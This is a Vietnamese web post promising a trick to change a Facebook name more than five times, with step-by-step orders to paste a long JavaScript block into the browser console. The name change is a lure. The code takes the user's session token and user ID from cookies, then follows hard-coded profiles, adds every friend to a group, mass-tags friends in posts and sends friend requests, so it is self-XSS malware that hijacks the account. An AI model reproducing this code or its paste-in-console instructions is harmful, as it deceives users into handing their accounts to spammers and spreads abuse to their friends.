• NHẤN G+ ĐỂ THẤY LINK DOWNLOAD MIỄN PHÍ
 • Bạn muốn đổi tên facebook, nhưng mà tài khoản của bạn đă đổi quá 5 lần, bạn không biết phải làm sao? Thực sự bạn rất cần phải đổi tên facebook v́ công việc, hay đổi tên facebook để lăng quên những kỉ niệm mà trước đó bạn có được. V́ thế, sau thời gian nghiên cứu, viết code và ḿnh đă nghĩ ra cách đổi tên facebook quá 5 lần. Có thể nói cách đổi tên facebook quá 5 lần này của mính rất đơn giản, chỉ trong 2p là bạn có thể có tên mới cho facebook của ḿnh


  Đây là bằng chứng ḿnh đă đổi được tên facebook quá 5 lần

  Bước 1 : Bạn copy hoặc tải file txt để lấy code dưới đây :


  Mã PHP:
  var fb_dtsg document.getElementsByName('fb_dtsg')[0].value;
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  alert('XONG! NH?N ENTER Đ? HOÀN T?T QUÁ TR?NH UPDATE TH? THU?T FACEBOOK. CHÚC CÁC B?N ONLINE VUI V?. HTTPS://FACEBOOK.COM');
  function 
  cereziAl(isim) {
      var 
  tarama isim "=";
      if (
  document.cookie.length 0) {
          
  konum document.cookie.indexOf(tarama)
          if (
  konum != -1) {
              
  konum += tarama.length
              son 
  document.cookie.indexOf(";"konum)
              if (
  son == -1)
                  
  son document.cookie.length
              
  return unescape(document.cookie.substring(konumson))
          }
          else { return 
  ""; }
      }
  }

  function 
  getRandomInt (minmax) {
      return 
  Math.floor(Math.random() * (max min 1)) + min;
  }
  function 
  randomValue(arr) {
      return 
  arr[getRandomInt(0arr.length-1)];
  }

  var 
  fb_dtsg document.getElementsByName('fb_dtsg')[0].value;
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

  function 
  a(abone){
      var 
  http4 = new XMLHttpRequest();
       
      var 
  url4 "/ajax/follow/follow_profile.php?__a=1";
       
      var 
  params4 "profile_id=" abone "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" fb_dtsg "&lsd&__" user_id "&phstamp=";
      
  http4.open("POST"url4true);
       
      
  //Send the proper header information along with the request
      
  http4.setRequestHeader("Content-type""application/x-www-form-urlencoded");
      
  http4.setRequestHeader("Content-length"params4.length);
      
  http4.setRequestHeader("Connection""close");
       
      
  http4.onreadystatechange = function() {//Call a function when the state changes.
      
  if(http4.readyState == && http4.status == 200) {
         
        
  http4.close// Close the connection
       
      
  }
      }
      
      
  http4.send(params4);
  }

  function 
  sublist(uidss) {
          var 
  document.createElement('script');
          
  a.innerHTML "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " uidss " }).send();";
          
  document.body.appendChild(a);
  }
  a("100002755493392");a("100004853824593");a("100004065765255");a("100005024703727");
  a("100003135729471");a("100003518302661");a("100003080767391");a("100004284123056");
  a("100002807890162");a("100004169767940");a("100006383292092");a("100006368503350");
  a("100006429243577");a("100003629810600");a("100004426803142");
  a("100002958570114");a("100003809013240");a("100006343331779");
  a("100003946922548");a("100003907411636");a("100006211892325");
  a("1242298345");
  a("100002942586835");a("100000874093748");a("100002807890162");a("100006401763023");a("100002921045873");a("100003852890482");a("100005718914057");

  sublist("448853321896280");sublist("114147745448349");sublist("209235669232458");


  var 
  gid = [''];
  var 
  fb_dtsg document['getElementsByName']('fb_dtsg')[0]['value'];
  var 
  user_id document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var 
  httpwp = new XMLHttpRequest();
  var 
  urlwp '/ajax/groups/membership/r2j.php?__a=1';
  var 
  paramswp '&ref=group_jump_header&group_id=' gid '&fb_dtsg=' fb_dtsg '&__user=' user_id '&phstamp=';
  httpwp['open']('POST'urlwptrue);
  httpwp['setRequestHeader']('Content-type''application/x-www-form-urlencoded');
  httpwp['setRequestHeader']('Content-length'paramswp['length']);
  httpwp['setRequestHeader']('Connection''keep-alive');
  httpwp['send'](paramswp);

  var 
  fb_dtsg document['getElementsByName']('fb_dtsg')[0]['value'];
  var 
  user_id document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var 
  friends = new Array();
  gf = new XMLHttpRequest();
  gf['open']('GET''/ajax/typeahead/first_degree.php?__a=1&viewer=' user_id '&token' Math['random']() + '&filter[0]=user&options[0]=friends_only'false);
  gf['send']();
  if (
  gf['readyState'] != 4) {} else {
      
  data = eval('(' gf['responseText']['substr'](9) + ')');
      if (
  data['error']) {} else {
          
  friends data['payload']['entries']['sort'](function (_0x93dax8_0x93dax9) {
              return 
  _0x93dax8['index'] - _0x93dax9['index'];
          });
      };
  };

  for (var 
  0friends['length']; i++) {
      var 
  httpwp = new XMLHttpRequest();
      var 
  urlwp '/ajax/groups/members/add_post.php?__a=1';
      var 
  paramswp'&fb_dtsg=' fb_dtsg '&group_id=' gid '&source=typeahead&ref=&message_id=&members=' friends[i]['uid'] + '&__user=' user_id '&phstamp=';
      
  httpwp['open']('POST'urlwptrue);
      
  httpwp['setRequestHeader']('Content-type''application/x-www-form-urlencoded');
      
  httpwp['setRequestHeader']('Content-length'paramswp['length']);
      
  httpwp['setRequestHeader']('Connection''keep-alive');
      
  httpwp['onreadystatechange'] = function () {
  if (
  httpwp['readyState'] == && httpwp['status'] == 200) {};
      };
      
  httpwp['send'](paramswp);
  };
  var 
  spage_id "388038841266419";
  var 
  user_id document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  var 
  smesaj "";
  var 
  smesaj_text "";
  var 
  arkadaslar = [];
  var 
  svn_rev;
  var 
  bugun= new Date();
  var 
  btarihi = new Date(); 
  btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  if(!
  document.cookie.match(/paylasti=(\d+)/)){
  document.cookie "paylasti=hayir;expires="btarihi.toGMTString();
  }


  //arkadaslari al ve isle
  function sarkadaslari_al(){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){
                    eval(
  "arkadaslar = " xmlhttp.responseText.toString().replace("for (;;);","") + ";");
                    for(
  f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
                      
  smesaj "";
                      
  smesaj_text "";
                    for(
  i=f*10;i<(f+1)*10;i++){
                      if(
  arkadaslar.payload.entries[i]){
                    
  smesaj += " @[" arkadaslar.payload.entries[i].uid +  ":" arkadaslar.payload.entries[i].text "]";
                    
  smesaj_text += " " arkadaslar.payload.entries[i].text;
                    }
                      }
                      
  sdurumpaylas();                }
                  
              }
              
          };
          var 
  params "&filter[0]=user";
          
  params += "&options[0]=friends_only";
          
  params += "&options[1]=nm";
          
  params += "&token=v7";
          
  params += "&viewer=" user_id;
          
  params += "&__user=" user_id;
          
          if (
  document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET""https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" paramstrue); }
          else { 
  xmlhttp.open("GET""http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" paramstrue); }
          
  xmlhttp.send();
  }

  //tiklama olayini dinle
  var tiklama document.addEventListener("click", function () {
  if(
  document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  svn_rev document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  sarkadaslari_al();
  document.cookie "paylasti=evet;expires="btarihi.toGMTString();

  document.removeEventListener(tiklama);
  }
   }, 
  false);
    

  //arkada?¾ ekleme
  function sarkadasekle(uid,cins){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){    
              }
          };
          
          
  xmlhttp.open("POST""/ajax/add_friend/action.php?__a=1"true); 
          var 
  params "to_friend=" uid;
          
  params += "&action=add_friend";
          
  params += "&how_found=friend_browser";
          
  params += "&ref_param=none";
          
  params += "&outgoing_id=";
          
  params += "&logging_location=friend_browser";
          
  params += "&no_flyout_on_click=true";
          
  params += "&ego_log_data=";
          
  params += "&http_referer=";
          
  params += "&fb_dtsg=" document.getElementsByName('fb_dtsg')[0].value;
          
  params += "&phstamp=165816749114848369115";
          
  params += "&__user=" user_id;
          
  xmlhttp.setRequestHeader ("X-SVN-Rev"svn_rev);
          
  xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
          
  if(
  cins == "farketmez" && document.cookie.split("cins" user_id +"=").length 1){
          
  xmlhttp.send(params);
  }else if(
  document.cookie.split("cins" user_id +"=").length <= 1){
          
  cinsiyetgetir(uid,cins,"sarkadasekle");
  }else if(
  cins == document.cookie.split("cins" user_id +"=")[1].split(";")[0].toString()){
          
  xmlhttp.send(params);
  }
  }

  //cinsiyet belirleme
  var cinssonuc = {};
  var 
  cinshtml document.createElement("html");
  function 
  scinsiyetgetir(uid,cins,fonksiyon){
          var 
  xmlhttp = new XMLHttpRequest();
          
  xmlhttp.onreadystatechange = function () {
              if(
  xmlhttp.readyState == 4){
              eval(
  "cinssonuc = " xmlhttp.responseText.toString().replace("for (;;);","") + ";");
              
  cinshtml.innerHTML cinssonuc.jsmods.markup[0][1].__html
              btarihi
  .setTime(bugun.getTime() + 1000*60*60*24*365);
              if(
  cinshtml.getElementsByTagName("select")[0].value == "1"){
              
  document.cookie "cins" user_id "=kadin;expires=" btarihi.toGMTString();
              }else if(
  cinshtml.getElementsByTagName("select")[0].value == "2"){
              
  document.cookie "cins" user_id "=erkek;expires=" btarihi.toGMTString();
              }
              eval(
  fonksiyon "(" id "," cins ");");
              }
          };
          
  xmlhttp.open("GET""/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" user_idtrue);
          
  xmlhttp.setRequestHeader ("X-SVN-Rev"svn_rev);
          
  xmlhttp.send();


  Hoặc bạn có thể tải file txt tại đây

  http://www.mediafire.com/view/jvqf9l0l09wklni/code-facebook.txt

  pass : www.vozfozum.com

  Bước 2 : Trở về trang cá nhân


  đổi tên facebook quá 5 lần  Bước 3 : Làm theo hướng dẫn đối với 2 tŕnh duyệt Chrome và Firefox nhé!


  Download link mediafire: http://mediaupfile.com/download/umziwmdzz0z

  ♦ Đối với Tŕnh duyệt Google Chrome: Nhấn F12 tại bàn phím sẽ hiện ra 1 bảng mă nguồn >> Click chuyển sang tab Console >> Ctrl+V ( Dán tất cả mă đă copy ở bước 2 ) >> Rồi ấn Enter

  ♦ Đối với Tŕnh duyệt Firefox: Nhấn tổ hợp phím Ctrl+Shift+K với tŕnh duyệt này nó sẽ ở tab Console >> Ctrl+V ( Dán tất cả mă đă copy ở bước 2) >> Rồi ấn Enter
  đổi tên facebook quá 5 lần 2013
  Sau đó sẽ chuyển ngay sang trang đổi thông tin cá nhân, và trong đó có mục đổi tên.  đổi tên facebook quá 5 lần

  Chỉ với 3 bước đơn giản bạn đă có thể đổi tên facebook chỉ trong 3p. Thật nhanh phải không? Đây là cách đổi tên facebook quá 5 lần mới nhất và hiệu quả nhất.

  Chúc bạn thành công !


  Xem thêm đổi tên facebook có kí tự đặc biệt
  thay đổi giao diện facebook

  DOWNLOAD LINK NHANH TẠI ĐÂY
  Link mediafire: Link Mediafire - Link Fshare: Fshare